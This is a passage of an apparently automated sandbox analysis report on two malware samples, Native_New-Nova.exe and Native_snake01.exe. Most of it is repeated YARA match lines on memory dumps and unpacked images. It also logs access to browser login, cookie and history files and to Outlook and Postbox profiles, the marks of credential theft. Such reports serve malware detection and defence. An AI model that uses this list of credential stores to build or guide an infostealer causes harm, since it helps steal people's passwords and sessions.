                      Source: Yara matchFile source: 00000012.00000002.3632429865.0000000004A60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3626656997.00000000025A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3624684011.0000000002520000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3622736534.0000000002171000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3634096660.0000000003611000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3630979840.00000000034E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3623045015.00000000021F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.1209065105.0000000000769000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Native_New-Nova.exe PID: 7852, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Native_New-Nova.exe PID: 3000, type: MEMORYSTR
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.2232746.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.50c0000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.21b2746.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.3510190.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.223183e.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.4a60f08.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.223183e.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3616478.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.3510190.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.3.Native_New-Nova.exe.55fec8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.21b2746.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.50c0000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.25a0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.2520000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.2232746.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.4a60f08.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.2520f08.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.25a0000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.2520000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.34e5570.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3640190.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.21b183e.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.2520f08.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.34e5570.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3615570.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.3.Native_New-Nova.exe.55fec8.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3616478.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3640190.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.34e6478.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.Native_New-Nova.exe.7693e8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.4a60000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.Native_New-Nova.exe.7693e8.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3615570.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.4a60000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.21b183e.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.34e6478.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000012.00000003.1257785893.000000000055F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3634743703.00000000050C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3632429865.0000000004A60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3626656997.00000000025A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3624684011.0000000002520000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3622736534.0000000002171000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3634096660.0000000003611000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3630979840.00000000034E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3623045015.00000000021F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.1209065105.0000000000769000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Native_New-Nova.exe PID: 7852, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Native_New-Nova.exe PID: 3000, type: MEMORYSTR
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.2232746.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.50c0000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.21b2746.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.3510190.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.223183e.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.4a60f08.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.223183e.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3616478.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.3510190.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.3.Native_New-Nova.exe.55fec8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.21b2746.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.50c0000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.25a0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.2520000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.2232746.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.4a60f08.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.2520f08.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.25a0000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.2520000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.34e5570.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3640190.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.21b183e.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.2520f08.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.34e5570.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3615570.6.unpack, type: UNPACKEDPE
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Remote Access Functionality

                      Source: Yara matchFile source: Process Memory Space: Native_New-Nova.exe PID: 3000, type: MEMORYSTR
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.2232746.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.50c0000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.21b2746.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.3510190.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.223183e.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.4a60f08.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.223183e.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3616478.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.3510190.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.3.Native_New-Nova.exe.55fec8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.21b2746.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.50c0000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.25a0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.2520000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.2232746.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.4a60f08.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.2520f08.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.25a0000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.2520000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.34e5570.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3640190.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.21b183e.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.2520f08.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.34e5570.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3615570.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.3.Native_New-Nova.exe.55fec8.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3616478.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3640190.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.34e6478.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.Native_New-Nova.exe.7693e8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.4a60000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.Native_New-Nova.exe.7693e8.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3615570.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.4a60000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.21b183e.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.34e6478.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000012.00000003.1257785893.000000000055F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3634743703.00000000050C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3632429865.0000000004A60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3626656997.00000000025A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3624684011.0000000002520000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3622736534.0000000002171000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3634096660.0000000003611000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3630979840.00000000034E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3623045015.00000000021F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.1209065105.0000000000769000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Native_New-Nova.exe PID: 7852, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Native_New-Nova.exe PID: 3000, type: MEMORYSTR
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.2232746.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.50c0000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.21b2746.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.3510190.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.223183e.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.4a60f08.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.223183e.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3616478.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.3510190.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.3.Native_New-Nova.exe.55fec8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.21b2746.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.50c0000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.25a0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.2520000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.2232746.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.4a60f08.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.2520f08.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.25a0000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.2520000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.34e5570.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3640190.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.21b183e.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.2520f08.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.34e5570.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3615570.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.3.Native_New-Nova.exe.55fec8.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3616478.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3640190.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.34e6478.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.Native_New-Nova.exe.7693e8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.4a60000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.Native_New-Nova.exe.7693e8.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3615570.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.4a60000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.21b183e.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.34e6478.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000012.00000003.1257785893.000000000055F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3634743703.00000000050C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3632429865.0000000004A60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3626656997.00000000025A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3624684011.0000000002520000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3622736534.0000000002171000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3634096660.0000000003611000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3630979840.00000000034E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3623045015.00000000021F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.1209065105.0000000000769000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.3626598913.0000000002531000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.3625599331.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.2232746.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.50c0000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.21b2746.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.3510190.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.223183e.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.4a60f08.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.223183e.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3616478.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Native_snake01.exe.49c0000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.3510190.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.3.Native_New-Nova.exe.55fec8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.21b2746.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.50c0000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.25a0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.2520000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.2232746.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.4a60f08.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.3.Native_snake01.exe.5e03c0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Native_snake01.exe.4a50000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Native_snake01.exe.21c1216.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.2520f08.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_snake01.exe.5100000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_snake01.exe.5100000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.25a0000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.2520000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_snake01.exe.4a70f20.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.34e5570.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_snake01.exe.4a70000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3640190.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.21b183e.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.2520f08.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.3.Native_snake01.exe.5e03c0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Native_snake01.exe.49c0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.34e5570.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3615570.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Native_snake01.exe.21c02f6.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.3.Native_New-Nova.exe.55fec8.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3616478.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_snake01.exe.4a70f20.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3640190.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Native_snake01.exe.4a50000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_snake01.exe.1fc02f6.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_snake01.exe.1fc1216.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.34e6478.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.Native_New-Nova.exe.7693e8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_snake01.exe.1fc1216.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_snake01.exe.4a70000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.4a60000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Native_snake01.exe.49c0f20.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.Native_New-Nova.exe.7693e8.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3615570.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.4a60000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.21b183e.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Native_snake01.exe.21c02f6.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Native_snake01.exe.49c0f20.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_snake01.exe.1fc02f6.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.34e6478.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Native_snake01.exe.21c1216.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000C.00000003.1207936513.00000000004F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.1257785893.000000000055F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3634743703.00000000050C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3632429865.0000000004A60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000003.1257746964.00000000005E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3626656997.00000000025A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.3634670005.0000000004A50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.3623510104.0000000002180000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3624684011.0000000002520000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3622736534.0000000002171000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3634096660.0000000003611000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
